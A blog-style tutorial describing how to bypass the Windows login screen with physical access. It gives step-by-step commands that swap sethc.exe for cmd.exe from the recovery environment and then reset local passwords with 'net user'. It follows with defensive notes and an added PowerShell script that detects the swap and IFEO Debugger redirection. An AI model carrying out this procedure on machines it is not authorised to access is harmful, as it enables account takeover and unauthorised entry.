How to crack Windows passwords in 5 minutes

I’ve been meaning to write about this for a long time. Windows 7 has a well-known weakness that can easily be exploited to log into any machine you have physical access to. The trick is not specific to Windows 7: it works on any Windows install whose system drive is not encrypted, because it relies on being able to swap a file in System32 from outside the running OS rather than on a bug in the login code itself.

It all starts at the password-protected login screen (drawn by winlogon.exe). Two things are worth noticing there:
– The user names are listed
– The accessibility shortcuts still work (try hitting left Alt + left Shift + Print Screen, the High Contrast shortcut, from the login screen)

To handle those shortcuts, winlogon.exe launches another executable, sethc.exe (you have probably already seen the Sticky Keys dialog it pops up when Shift is pressed five times).

The trick relies on the fact that winlogon launches c:\windows\system32\sethc.exe by path, without checking what the file actually is, and launches it before anyone has logged in, so it runs as SYSTEM.
Replace that file with a copy of cmd.exe and you get a SYSTEM command prompt at the login screen.
That is all you need to change any local user’s password and walk straight past the login screen.

Anyway, here is the five-minute procedure:
1/ Reboot the computer, hit F8 for the boot options and select “Repair your computer” (this needs the Windows Recovery Environment to be present on the disk; booting a Windows 7 install DVD or USB stick and choosing “Repair your computer” there works just as well)
2/ Start a Command Prompt from the System Recovery Options
3/ Make a backup of sethc.exe (the recovery environment does not always map the Windows partition to C:, so check with dir first and adjust the drive letter below if needed):
move c:\windows\system32\sethc.exe c:\windows\system32\sethc.exe.bck
4/ Copy the command prompt over it:
copy c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe
5/ Restart the computer
6/ At the login screen, trigger the Sticky Keys helper (i.e. sethc.exe) by hitting Shift five times; the prompt that appears runs as SYSTEM, which is why the next step works without knowing any password
7/ In the new prompt, change the password (net user on its own lists the local accounts if you need the exact name):
net user [username] [password]

Don’t forget to restore the original sethc.exe file once you are done: boot back into the recovery prompt, delete the cmd.exe copy and move sethc.exe.bck back to sethc.exe. Leaving the swap in place keeps a SYSTEM shell reachable from the login screen for anyone who walks up to the machine, and both the swapped binary and the .bck file are obvious evidence of what was done.

The downside of this method is, of course, that you need physical access to the machine, and that the system drive must not be encrypted: with BitLocker (or any other full-disk encryption) enabled you cannot reach sethc.exe from the recovery prompt in the first place.
That is also why it has never really been “patched”: Microsoft treats unrestricted physical access to an unencrypted disk as game over regardless of what the login screen does, so the real defences are disk encryption, a firmware password that blocks booting from other media, and checking that the accessibility binaries in System32 are still the genuine signed ones.
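Since the only reliable fix is making sure nobody has swapped these binaries, here is a check a defender can run on a machine they suspect. This is an added example and not part of the original post: it assumes a standard install with the accessibility helpers under %SystemRoot%\System32, PowerShell 4 or later (for Get-FileHash), and an elevated prompt. It also looks for the registry variant of the same trick (an Image File Execution Options “Debugger” entry for sethc.exe, which makes the loader start another program instead), which the post does not cover.

```powershell
# Added example, not from the original post. Checks whether the accessibility
# helpers winlogon launches from the login screen have been replaced with
# cmd.exe (the swap described above) or redirected via an IFEO Debugger value.
# Assumes a standard install (helpers under %SystemRoot%\System32); run elevated.

function Test-AccessibilityHelper {
    $system32 = Join-Path $env:SystemRoot 'System32'
    $cmdHash  = (Get-FileHash -Algorithm SHA256 (Join-Path $system32 'cmd.exe')).Hash
    $ifeo     = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'

    # sethc.exe is the one the post swaps; the others are started the same way
    # by winlogon (Ease of Access button, On-Screen Keyboard, Narrator, ...).
    $helpers = 'sethc.exe', 'utilman.exe', 'osk.exe', 'narrator.exe',
               'magnify.exe', 'displayswitch.exe'

    foreach ($name in $helpers) {
        $path = Join-Path $system32 $name
        if (-not (Test-Path $path)) { continue }

        $hash = (Get-FileHash -Algorithm SHA256 $path).Hash
        $sig  = Get-AuthenticodeSignature $path
        $desc = (Get-Item $path).VersionInfo.FileDescription
        $dbg  = (Get-ItemProperty -Path (Join-Path $ifeo $name) -Name Debugger `
                    -ErrorAction SilentlyContinue).Debugger

        $findings = @()
        # A byte-identical copy of cmd.exe is exactly what the swap procedure leaves behind.
        if ($hash -eq $cmdHash) { $findings += 'byte-identical to cmd.exe' }
        # A renamed binary keeps its version resource, so the description gives it away too.
        if ($desc -eq 'Windows Command Processor') { $findings += "FileDescription '$desc'" }
        # Genuine helpers carry a valid Microsoft signature (embedded or catalog; see note below).
        if ($sig.Status -ne 'Valid') {
            $findings += "signature status $($sig.Status)"
        } elseif ($sig.SignerCertificate.Subject -notmatch 'Microsoft') {
            $findings += "signed by $($sig.SignerCertificate.Subject)"
        }
        # Registry variant: the file is untouched, but the loader starts the 'debugger' instead.
        if ($dbg) { $findings += "IFEO Debugger = $dbg" }

        [pscustomobject]@{
            Helper   = $name
            Status   = if ($findings) { 'SUSPICIOUS' } else { 'ok' }
            Sha256   = $hash.Substring(0, 16)
            Findings = $findings -join '; '
        }
    }

    # A leftover backup from step 3 of the post is itself a strong indicator.
    Get-ChildItem $system32 -Filter 'sethc.exe*' -ErrorAction SilentlyContinue |
        Where-Object { $_.Name -ne 'sethc.exe' } |
        ForEach-Object {
            [pscustomobject]@{ Helper = $_.Name; Status = 'SUSPICIOUS'; Sha256 = ''; Findings = 'leftover backup file' }
        }
}

Test-AccessibilityHelper | Format-Table -AutoSize
```

The hash and FileDescription checks are the decisive ones for the swap in this post: a genuine sethc.exe is never identical to cmd.exe and never describes itself as “Windows Command Processor”. On Windows 7 many System32 binaries are catalog-signed rather than carrying an embedded signature, so an older PowerShell may report them as NotSigned; on that version confirm the signature column against a known-good machine instead of treating it as proof of tampering.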